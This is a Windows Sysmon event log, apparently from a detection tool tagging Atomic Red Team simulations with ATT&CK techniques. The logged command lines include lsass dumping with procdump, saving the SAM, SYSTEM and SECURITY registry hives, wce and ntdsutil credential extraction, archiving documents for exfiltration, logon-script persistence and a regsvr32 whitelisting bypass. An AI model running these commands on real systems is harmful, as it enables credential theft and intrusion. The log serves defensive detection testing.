Microsoft® Windows® Operating System
Microsoft Corporation
certutil.exe -encode c:\file.exe file.txt
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4
747F3D96-DA3F-5D31-0000-00104C173C00
4832
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "certutil.exe -encode c:\file.exe file.txt"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548223.309488,2019-07-19T18:57:03.309488+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "certutil.exe -encode c:\file.exe file.txt" ),1,"
1
5
4
1
0
0x8000000000000000
4061
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:03.223
747F3D96-DA3F-5D31-0000-00104C173C00
4832
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "certutil.exe -encode c:\file.exe file.txt"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548097.044623,2019-07-19T18:54:57.044623+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
4054
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:54:16.818
747F3D96-D998-5D31-0000-00101BB73900
2424
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548056.830063,2019-07-19T18:54:16.830063+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "rar a -r exfilthis.rar *.docx" ),1,"
1
5
4
1
0
0x8000000000000000
4053
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:54:16.766
747F3D96-D998-5D31-0000-001008B43900
2000
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "rar a -r exfilthis.rar *.docx"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548056.782667,2019-07-19T18:54:16.782667+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
4052
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:54:01.940
747F3D96-D989-5D31-0000-0010FC7B3900
4944
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548035.018275,2019-07-19T18:53:55.018275+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d " cmd.exe ),1,"
1
5
4
1
0
0x8000000000000000
4049
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:53:54.968
747F3D96-D982-5D31-0000-0010DC633900
4240
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d " cmd.exe
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548034.976854,2019-07-19T18:53:54.976854+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
4048
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:53:47.230
747F3D96-D97B-5D31-0000-0010F0F03800
6888
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1563548027.239318,2019-07-19T18:53:47.239318+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\regsvr32.exe) with commandline ( /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll)",1,"
1
5
4
1
0
0x8000000000000000
4047
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:53:47.056
747F3D96-D97B-5D31-0000-00109DEB3800
5788
C:\Windows\SysWOW64\regsvr32.exe
10.0.17763.1 (WinBuild.160101.0800)
Microsoft(C) Register Server
Microsoft® Windows® Operating System
Microsoft Corporation
/s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8
747F3D96-D97A-5D31-0000-001019DE3800
5828
C:\Windows\System32\regsvr32.exe
"C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,1563548027.239318,2019-07-19T18:53:47.239318+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\regsvr32.exe ) through command line ( /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1,"
1
5
4
1
0
0x8000000000000000
4047
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:53:47.056
747F3D96-D97B-5D31-0000-00109DEB3800
5788
C:\Windows\SysWOW64\regsvr32.exe
10.0.17763.1 (WinBuild.160101.0800)
Microsoft(C) Register Server
Microsoft® Windows® Operating System
Microsoft Corporation
/s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8
747F3D96-D97A-5D31-0000-001019DE3800
5828
C:\Windows\System32\regsvr32.exe
"C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548027.239318,2019-07-19T18:53:47.239318+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\regsvr32.exe ) through command line ( /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1,"
1
5
4
1
0
0x8000000000000000
4047
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:53:47.056
747F3D96-D97B-5D31-0000-00109DEB3800
5788
C:\Windows\SysWOW64\regsvr32.exe
10.0.17763.1 (WinBuild.160101.0800)
Microsoft(C) Register Server
Microsoft® Windows® Operating System
Microsoft Corporation
/s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8
747F3D96-D97A-5D31-0000-001019DE3800
5828
C:\Windows\System32\regsvr32.exe
"C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549086.989143,2019-07-19T19:11:26.989143+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "vssadmin.exe create shadow /for=C:" ),1,"
1
5
4
1
0
0x8000000000000000
4128
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 15:11:26.958
747F3D96-DD9E-5D31-0000-00100C3F4B00
5036
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "vssadmin.exe create shadow /for=C:"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-DD47-5D31-0000-001015874900
5840
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549086.971596,2019-07-19T19:11:26.971596+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
4127
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 15:11:26.875
747F3D96-DD9E-5D31-0000-00106D3A4B00
4208
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-DD47-5D31-0000-001015874900
5840
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549086.884595,2019-07-19T19:11:26.884595+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q" ),1,"
1
5
4
1
0
0x8000000000000000
4126
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 15:11:26.845
747F3D96-DD9E-5D31-0000-001059374B00
584
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "ntdsutil “ac i ntds†“ifm†“create full C:\Atomic_Red_Team q q"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-DD47-5D31-0000-001015874900
5840
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549086.852817,2019-07-19T19:11:26.852817+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
4125
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 15:11:26.673
747F3D96-DD9E-5D31-0000-00109A2F4B00
264
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-DD47-5D31-0000-001015874900
5840
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1563549086.686585,2019-07-19T19:11:26.686585+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( "C:\Windows\system32\cmd.exe" /c "procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp" ) contains suspicious command ( procdump.exe),1,"
1
5
4
1
0
0x8000000000000000
4124
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 15:11:26.626
747F3D96-DD9E-5D31-0000-00106E2C4B00
5488
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-DD47-5D31-0000-001015874900
5840
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549086.686585,2019-07-19T19:11:26.686585+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp" ),1,"
1
5
4
1
0
0x8000000000000000
4124
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 15:11:26.626
747F3D96-DD9E-5D31-0000-00106E2C4B00
5488
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-DD47-5D31-0000-001015874900
5840
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549086.642464,2019-07-19T19:11:26.642464+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
4123
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 15:11:26.535
747F3D96-DD9E-5D31-0000-0010CB274B00
3016
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-DD47-5D31-0000-001015874900
5840
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549083.336763,2019-07-19T19:11:23.336763+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\security security" ),1,"
1
5
4
1
0
0x8000000000000000
4121
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 15:11:23.302
747F3D96-DD9B-5D31-0000-00106C1C4B00
7164
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "reg save HKLM\security security"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-DD47-5D31-0000-001015874900
5840
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549081.105496,2019-07-19T19:11:21.105496+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\system system" ),1,"
1
5
4
1
0
0x8000000000000000
4119
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 15:11:21.069
747F3D96-DD99-5D31-0000-001069A34A00
4080
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "reg save HKLM\system system"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-DD47-5D31-0000-001015874900
5840
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549077.243643,2019-07-19T19:11:17.243643+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\sam sam" ),1,"
1
5
4
1
0
0x8000000000000000
4117
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 15:11:17.211
747F3D96-DD95-5D31-0000-001075964A00
7140
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "reg save HKLM\sam sam"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-DD47-5D31-0000-001015874900
5840
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549077.224751,2019-07-19T19:11:17.224751+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
4116
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 15:11:17.139
747F3D96-DD95-5D31-0000-0010D6914A00
6264
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-DD47-5D31-0000-001015874900
5840
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1003] Credential Dumping - Process,1563549077.149274,2019-07-19T19:11:17.149274+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\cmd.exe) tried dumping credentials through commandline ( "C:\Windows\system32\cmd.exe" /c "wce -o output.txt" ),1,"
1
5
4
1
0
0x8000000000000000
4115
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 15:11:17.097
747F3D96-DD95-5D31-0000-0010B38E4A00
5216
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "wce -o output.txt"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-DD47-5D31-0000-001015874900
5840
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549077.149274,2019-07-19T19:11:17.149274+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "wce -o output.txt" ),1,"
1
5
4
1
0
0x8000000000000000
4115
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 15:11:17.097
747F3D96-DD95-5D31-0000-0010B38E4A00
5216
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "wce -o output.txt"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-DD47-5D31-0000-001015874900
5840
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549077.107912,2019-07-19T19:11:17.107912+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
4114
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 15:11:17.016
747F3D96-DD95-5D31-0000-0010148A4A00
5476
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
